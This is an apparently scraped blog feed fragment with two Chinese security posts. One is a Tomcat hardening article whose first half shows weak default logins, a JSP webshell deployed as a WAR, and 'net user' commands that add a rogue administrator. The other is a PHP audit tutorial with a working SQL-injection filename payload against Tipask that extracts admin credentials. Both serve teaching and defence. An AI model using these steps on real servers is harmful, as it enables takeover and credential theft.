&lt;p&gt;Tomcat的默认后台地址为:&lt;a href=&quot;http://域名:端口/manager/html.进入之后弹出登陆对话框,Tomcat默认的用户名admin,密码为空。&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://域名:端口/manager/html.进入之后弹出登陆对话框,Tomcat默认的用户名admin,密码为空。&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Tomcat的一些弱口令:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;tomcat tomcat&lt;br&gt;admin 空&lt;br&gt;admin admin&lt;br&gt;admin 123456&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20150909/2015090908440190493.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;然后来看一下Tomcat安装版默认的tomacat-users.xml配置文件&lt;br&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20150909/2015090908440294106.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;注：Linux平台及Windows平台免安装版本不受该漏洞影响。&lt;/p&gt;
&lt;p&gt;二.获取Webshell&lt;/p&gt;
&lt;p&gt;在Tomcat的后台有个WAR file to deploy模块，通过其可以上传WAR文件。Tomcat可以解析WAR文件，能够将其解压并生成web文件。&lt;br&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20150909/2015090908440250032.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;我们将一个jsp格式的webshell用WinRar打包然后将其后缀改名为WAR(本例为no.war)，这样;一个WAR包就生成了。最后将其上传到服务器，可以看到在Tomcat的后台中多了一个名为/no的目录。&lt;br&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20150909/2015090908440248016.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;点击该目录打开该目录jsp木马就运行了，这样就获得了一个Webshell。&lt;br&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20150909/2015090908440279290.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;三.获取服务器权限&lt;/p&gt;
&lt;p&gt;Tomcat服务默认是以system权限运行的，因此该jsp木马就继承了其权限，几乎可以对Web服务器进行所有的操作。&lt;br&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20150909/2015090908440219147.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;然后创建用户: net user Boom shellcode /add&lt;/p&gt;
&lt;p&gt;添加到管理员用户组: net localgroup administrators Boom /add&lt;br&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20150909/2015090908440298603.png&quot; alt=&quot;&quot;&gt;&lt;br&gt;然后可以干什么事我就不说了&lt;/p&gt;
&lt;h2 id=&quot;0x03_安全配置&quot;&gt;0x03 安全配置&lt;/h2&gt;&lt;p&gt;一.修改tomacat-users.xml或删除Tomcat后台&lt;/p&gt;
&lt;p&gt;修改\conf\tomacat-users.xml&lt;br&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20150909/2015090908440273000.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;删除Tomcat后台 \webapps全部删除就好。&lt;/p&gt;
&lt;p&gt;二.禁止列目录&lt;/p&gt;
&lt;p&gt;在IIS中如果设置不当，就会列出Web当前目录中的所有文件，然而在Tomcat也不例外。如果浏览者可以在客户端浏览Web目录，那将会存在较大的安全隐患，因此我们要确认Tomcat的设置中禁止列目录。\conf\web.xml下&lt;/p&gt;
&lt;p&gt;&lt;init-param&gt;&lt;/init-param&gt;&lt;/p&gt;
&lt;p&gt;&lt;param-name&gt;listings&lt;/param-name&gt;&lt;/p&gt;
&lt;p&gt;&lt;param-value&gt;false&lt;/param-value&gt;&lt;br&gt;　　&lt;br&gt;确认是false而不是true。&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20150909/2015090908440329796.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;三.服务降权&lt;/p&gt;
&lt;p&gt;默认安装时Tomcat是以系统服务权限运行的，因此缺省情况下几乎所有的Web服务器的管理员都具有Administrator权限，存在极大的安全隐患，所以我们的安全设置首先从Tomcat服务降权开始。&lt;/p&gt;
&lt;p&gt;首先创建一个普通用户，为其设置密码，将其密码策略设置为“密码永不过期”，比如我们创建的用户为tomcat。然后修改tomcat安装文件夹的访问权限，为tomcat赋予Tomcat文件夹的读、写、执行的访问权限，赋予Tomcat对WebApps文件夹的只读访问权限，如果某些Web应用程序需要写访问权限，单独为其授予对那个文件夹的写访问权限。&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20150909/2015090908440328686.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;“开始→运行”，输入services.msc打开服务管理器，找到Apache Tomcat服务，双击打开该服务的属性，在其实属性窗口中点击“登录”选项卡，在登录身份下选中“以此帐户”，然后在文本框中输入tomcat和密码，最后“确定”并重启服务器。这样tomcat就以tomcat这个普通用户的权限运行。&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20150909/2015090908440373699.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;然后重启服务,就生效了。这样普通用户tomcat运行的Tomcat其权限就大大地降低了，就算是攻击者获得了Webshell也不能进一步深入，从而威胁web服务器的安全。&lt;/p&gt;
&lt;p&gt;四.关闭war自动部署&lt;/p&gt;
&lt;p&gt;关闭war自动部署 unpackWARs=”false” autoDeploy=”false”。防止被植入木马等恶意程序&lt;/p&gt;
&lt;p&gt;应用程序部署与tomcat启动,不能使用同一个用户。&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;http://static.wooyun.org//drops/20150909/2015090908440348885.png&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;注：此文章获得乌云drops授权转载，©乌云知识库版权所有 未经许可 禁止转载&lt;/strong&gt;&lt;br&gt;&lt;strong&gt;文章来源：&lt;/strong&gt;&lt;br&gt;&lt;a href=&quot;http://drops.wooyun.org/%E8%BF%90%E7%BB%B4%E5%AE%89%E5%85%A8/8519&quot; target=&quot;_blank&quot; rel=&quot;external&quot;&gt;http://drops.wooyun.org/%E8%BF%90%E7%BB%B4%E5%AE%89%E5%85%A8/8519&lt;/a&gt;&lt;/p&gt;
</content>
    
    <summary type="html">
    
      &lt;h2 id=&quot;0x00_Tomcat简介&quot;&gt;0x00 Tomcat简介&lt;/h2&gt;&lt;p&gt;tomcat是一个开源Web服务器，基于Tomcat的Web运行效率高，可以在一般的硬件平台上流畅运行，因此，颇受Web站长的青睐。不过，在默认配置下其存在一定的安全隐患，可被恶意攻击。&lt;br&gt;
    
    </summary>
    
      <category term="系统加固" scheme="http://www.cnbraid.com/categories/%E7%B3%BB%E7%BB%9F%E5%8A%A0%E5%9B%BA/"/>
    
    
      <category term="Windows" scheme="http://www.cnbraid.com/tags/Windows/"/>
    
      <category term="tomcat" scheme="http://www.cnbraid.com/tags/tomcat/"/>
    
      <category term="加固" scheme="http://www.cnbraid.com/tags/%E5%8A%A0%E5%9B%BA/"/>
    
      <category term="服务器" scheme="http://www.cnbraid.com/tags/%E6%9C%8D%E5%8A%A1%E5%99%A8/"/>
    
  </entry>
  
  <entry>
    <title>【PHP代码审计】 那些年我们一起挖掘SQL注入 - 8.全局防护盲点的总结下篇</title>
    <link href="http://www.cnbraid.com/2016/05/31/sql7/"/>
    <id>http://www.cnbraid.com/2016/05/31/sql7/</id>
    <published>2016-05-31T02:35:00.000Z</published>
    <updated>2016-06-24T08:55:10.707Z</updated>
    
    <content type="html">&lt;h2 id=&quot;0x01_背景&quot;&gt;0x01 背景&lt;/h2&gt;&lt;p&gt;现在的WEB应用对SQL注入的防护基本都是判断GPC是否开启，然后使用addlashes函数对单引号等特殊字符进行转义。但仅仅使用这样的防护是存在很多盲点的，接上篇&lt;a href=&quot;http://www.cnbraid.com/2016/05/10/sql6/&quot;&gt;http://www.cnbraid.com/2016/05/10/sql6/&lt;/a&gt;，这里介绍另外两种情况。&lt;br&gt;&lt;strong&gt;盲点如下：&lt;/strong&gt;&lt;br&gt;①FILES注入，全局只转义掉GET、POST等传来的参数，遗漏了FILES；&lt;br&gt;②变量覆盖，危险函数：extract()、parse_str()、$$。&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sqlmangdian2.jpg&quot; alt=&quot;&quot;&gt;&lt;br&gt;&lt;a id=&quot;more&quot;&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&quot;0x02_漏洞分析&quot;&gt;0x02 漏洞分析&lt;/h2&gt;&lt;h3 id=&quot;FILES注入&quot;&gt;FILES注入&lt;/h3&gt;&lt;p&gt;FILES注入一般情况是是因为上传时把上传的名字带到insert入库产生的，这里看下tipask问答系统&lt;br&gt;首先看看它的全局防护是怎么处理的：&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;index.php里:&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;include&lt;/span&gt; TIPASK_ROOT . &lt;span class=&quot;string&quot;&gt;&#39;/model/tipask.class.php&#39;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$tipask&lt;/span&gt; = &lt;span class=&quot;keyword&quot;&gt;new&lt;/span&gt; tipask();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$tipask&lt;/span&gt;-&amp;gt;run();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;... ...&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;跟进到/model/tipask.class.php里:&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;init_request&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;()&lt;/span&gt; &lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;... ...&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;get = taddslashes(&lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;get, &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;post = taddslashes(array_merge(&lt;span class=&quot;variable&quot;&gt;$_GET&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;));&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        checkattack(&lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;post, &lt;span class=&quot;string&quot;&gt;&#39;post&#39;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        checkattack(&lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;get, &lt;span class=&quot;string&quot;&gt;&#39;get&#39;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;        &lt;span class=&quot;keyword&quot;&gt;unset&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &amp;#125;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;可以看到对get和post传来的数据进行了addslashes特殊转义处理，对$_FILES没有任何处理操作，我们全局搜索$_FILES，发现/control/attach.php有上传处理，我们跟进：&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;onupload&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;()&lt;/span&gt; &lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;comment&quot;&gt;//上传配置&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;variable&quot;&gt;$config&lt;/span&gt; = &lt;span class=&quot;keyword&quot;&gt;array&lt;/span&gt;(&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;string&quot;&gt;&quot;uploadPath&quot;&lt;/span&gt; =&amp;gt; &lt;span class=&quot;string&quot;&gt;&quot;data/attach/&quot;&lt;/span&gt;, &lt;span class=&quot;comment&quot;&gt;//保存路径&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;string&quot;&gt;&quot;fileType&quot;&lt;/span&gt; =&amp;gt; &lt;span class=&quot;keyword&quot;&gt;array&lt;/span&gt;(&lt;span class=&quot;string&quot;&gt;&quot;.rar&quot;&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&quot;.doc&quot;&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&quot;.docx&quot;&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&quot;.zip&quot;&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&quot;.pdf&quot;&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&quot;.txt&quot;&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&quot;.swf&quot;&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&quot;.wmv&quot;&lt;/span&gt;, &lt;span class=&quot;string&quot;&gt;&quot;xsl&quot;&lt;/span&gt;), &lt;span class=&quot;comment&quot;&gt;//文件允许格式&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;string&quot;&gt;&quot;fileSize&quot;&lt;/span&gt; =&amp;gt; &lt;span class=&quot;number&quot;&gt;10&lt;/span&gt; &lt;span class=&quot;comment&quot;&gt;//文件大小限制，单位MB&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;comment&quot;&gt;//文件上传状态,当成功时返回SUCCESS，其余值将直接返回对应字符窜&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;variable&quot;&gt;$state&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&quot;SUCCESS&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;variable&quot;&gt;$clientFile&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$_FILES&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&quot;upfile&quot;&lt;/span&gt;];&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (!&lt;span class=&quot;keyword&quot;&gt;isset&lt;/span&gt;(&lt;span class=&quot;variable&quot;&gt;$clientFile&lt;/span&gt;)) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;keyword&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;string&quot;&gt;&quot;&amp;#123;&#39;state&#39;:&#39;文件大小超出服务器配置！&#39;,&#39;url&#39;:&#39;null&#39;,&#39;fileType&#39;:&#39;null&#39;&amp;#125;&quot;&lt;/span&gt;; &lt;span class=&quot;comment&quot;&gt;//请修改php.ini中的upload_max_filesize和post_max_size&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;keyword&quot;&gt;exit&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;comment&quot;&gt;//格式验证&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;variable&quot;&gt;$current_type&lt;/span&gt; = strtolower(strrchr(&lt;span class=&quot;variable&quot;&gt;$clientFile&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&quot;name&quot;&lt;/span&gt;], &lt;span class=&quot;string&quot;&gt;&#39;.&#39;&lt;/span&gt;));&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (!in_array(&lt;span class=&quot;variable&quot;&gt;$current_type&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$config&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;fileType&#39;&lt;/span&gt;])) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;variable&quot;&gt;$state&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&quot;不支持的文件类型！&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;comment&quot;&gt;//大小验证&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;variable&quot;&gt;$file_size&lt;/span&gt; = &lt;span class=&quot;number&quot;&gt;1024&lt;/span&gt; * &lt;span class=&quot;number&quot;&gt;1024&lt;/span&gt; * &lt;span class=&quot;variable&quot;&gt;$config&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;fileSize&#39;&lt;/span&gt;];&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$clientFile&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&quot;size&quot;&lt;/span&gt;] &amp;gt; &lt;span class=&quot;variable&quot;&gt;$file_size&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;variable&quot;&gt;$state&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&quot;文件大小超出限制！&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;comment&quot;&gt;//保存文件&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (&lt;span class=&quot;variable&quot;&gt;$state&lt;/span&gt; == &lt;span class=&quot;string&quot;&gt;&quot;SUCCESS&quot;&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;variable&quot;&gt;$targetfile&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$config&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;uploadPath&#39;&lt;/span&gt;] . gmdate(&lt;span class=&quot;string&quot;&gt;&#39;ym&#39;&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;time) . &lt;span class=&quot;string&quot;&gt;&#39;/&#39;&lt;/span&gt; . random(&lt;span class=&quot;number&quot;&gt;8&lt;/span&gt;) . strrchr(&lt;span class=&quot;variable&quot;&gt;$clientFile&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&quot;name&quot;&lt;/span&gt;], &lt;span class=&quot;string&quot;&gt;&#39;.&#39;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;variable&quot;&gt;$result&lt;/span&gt; = &lt;span class=&quot;variable&quot;&gt;$_ENV&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;attach&#39;&lt;/span&gt;]-&amp;gt;movetmpfile(&lt;span class=&quot;variable&quot;&gt;$clientFile&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$targetfile&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&lt;span class=&quot;keyword&quot;&gt;if&lt;/span&gt; (!&lt;span class=&quot;variable&quot;&gt;$result&lt;/span&gt;) &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;variable&quot;&gt;$state&lt;/span&gt; = &lt;span class=&quot;string&quot;&gt;&quot;文件保存失败！&quot;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&amp;#125; &lt;span class=&quot;keyword&quot;&gt;else&lt;/span&gt; &amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;comment&quot;&gt;//这里将上传的文件名带入数据库查询&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;			&lt;span class=&quot;variable&quot;&gt;$_ENV&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&#39;attach&#39;&lt;/span&gt;]-&amp;gt;add(&lt;span class=&quot;variable&quot;&gt;$clientFile&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&quot;name&quot;&lt;/span&gt;], &lt;span class=&quot;variable&quot;&gt;$current_type&lt;/span&gt;, &lt;span class=&quot;variable&quot;&gt;$clientFile&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&quot;size&quot;&lt;/span&gt;], &lt;span class=&quot;variable&quot;&gt;$targetfile&lt;/span&gt;, &lt;span class=&quot;number&quot;&gt;0&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;		&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;    &lt;span class=&quot;comment&quot;&gt;//向浏览器返回数据json数据&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;string&quot;&gt;&#39;&amp;#123;&quot;state&quot;:&quot;&#39;&lt;/span&gt; . &lt;span class=&quot;variable&quot;&gt;$state&lt;/span&gt; . &lt;span class=&quot;string&quot;&gt;&#39;&quot;,&quot;url&quot;:&quot;&#39;&lt;/span&gt; . &lt;span class=&quot;variable&quot;&gt;$targetfile&lt;/span&gt; . &lt;span class=&quot;string&quot;&gt;&#39;&quot;,&quot;fileType&quot;:&quot;&#39;&lt;/span&gt; . &lt;span class=&quot;variable&quot;&gt;$current_type&lt;/span&gt; . &lt;span class=&quot;string&quot;&gt;&#39;&quot;,&quot;original&quot;:&quot;&#39;&lt;/span&gt; . &lt;span class=&quot;variable&quot;&gt;$clientFile&lt;/span&gt;[&lt;span class=&quot;string&quot;&gt;&quot;name&quot;&lt;/span&gt;] . &lt;span class=&quot;string&quot;&gt;&#39;&quot;&amp;#125;&#39;&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;可以看到这句$_ENV[‘attach’]-&amp;gt;add($clientFile[“name”]…)，将$clientFile[name] = $_FILES[“upfile”][name]带入了如下add入库的操作，从而造成注入。&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;function&quot;&gt;&lt;span class=&quot;keyword&quot;&gt;function&lt;/span&gt; &lt;span class=&quot;title&quot;&gt;add&lt;/span&gt;&lt;span class=&quot;params&quot;&gt;(&lt;span class=&quot;variable&quot;&gt;$filename&lt;/span&gt;,&lt;span class=&quot;variable&quot;&gt;$ftype&lt;/span&gt;,&lt;span class=&quot;variable&quot;&gt;$fsize&lt;/span&gt;,&lt;span class=&quot;variable&quot;&gt;$location&lt;/span&gt;,&lt;span class=&quot;variable&quot;&gt;$isimage&lt;/span&gt;=&lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;)&lt;/span&gt; &lt;/span&gt;&amp;#123;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;variable&quot;&gt;$uid&lt;/span&gt;=&lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;base-&amp;gt;user[&lt;span class=&quot;string&quot;&gt;&#39;uid&#39;&lt;/span&gt;];&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;db-&amp;gt;query(&lt;span class=&quot;string&quot;&gt;&quot;INSERT INTO &quot;&lt;/span&gt;.DB_TABLEPRE.&lt;span class=&quot;string&quot;&gt;&quot;attach(time,filename,filetype,filesize,location,isimage,uid)  VALUES (&amp;#123;$this-&amp;gt;base-&amp;gt;time&amp;#125;,&#39;$filename&#39;,&#39;$ftype&#39;,&#39;$fsize&#39;,&#39;$location&#39;,$isimage,$uid)&quot;&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;	&lt;span class=&quot;keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;variable&quot;&gt;$this&lt;/span&gt;-&amp;gt;db-&amp;gt;insert_id();&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&amp;#125;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;上传一个文件，然后修改文件名称为以下代码即可获取管理员账户密码：&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;filename=&quot;1&#39;,&#39;.php&#39;,1,(&lt;span class=&quot;operator&quot;&gt;select &lt;span class=&quot;keyword&quot;&gt;concat&lt;/span&gt;(username,&lt;span class=&quot;number&quot;&gt;0x23&lt;/span&gt;,&lt;span class=&quot;keyword&quot;&gt;password&lt;/span&gt;) &lt;span class=&quot;keyword&quot;&gt;from&lt;/span&gt; ask_user &lt;span class=&quot;keyword&quot;&gt;limit&lt;/span&gt; &lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;),&lt;span class=&quot;number&quot;&gt;2&lt;/span&gt;,&lt;span class=&quot;number&quot;&gt;1&lt;/span&gt;)#.jpg&lt;span class=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;数据库里成功将管理员账户密码插入到attach表中：&lt;br&gt;&lt;img src=&quot;http://7xk8bu.com1.z0.glb.clouddn.com/sql6_01.jpg&quot; alt=&quot;&quot;&gt;&lt;/p&gt;
&lt;h3 id=&quot;变量覆盖&quot;&gt;变量覆盖&lt;/h3&gt;&lt;p&gt;出现比较多的是&lt;strong&gt;extract函数&lt;/strong&gt;，例如extract($_POST)会直接从POST数组中取出变量，覆盖掉之前的一些变量。&lt;br&gt;&lt;figure class=&quot;highlight php&quot;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&quot;code&quot;&gt;&lt;pre&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;preprocessor&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;&lt;span class=&quot;variable&quot;&gt;$a&lt;/span&gt;=&lt;span class=&quot;number&quot;&gt;222333&lt;/span&gt;;&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;@extract(&lt;span class=&quot;variable&quot;&gt;$_POST&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;span class=&quot;line&quot;&gt;print_r(&lt;span class=&quot;variable&quot;&gt;$a&lt;/span&gt;);&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/p&gt;
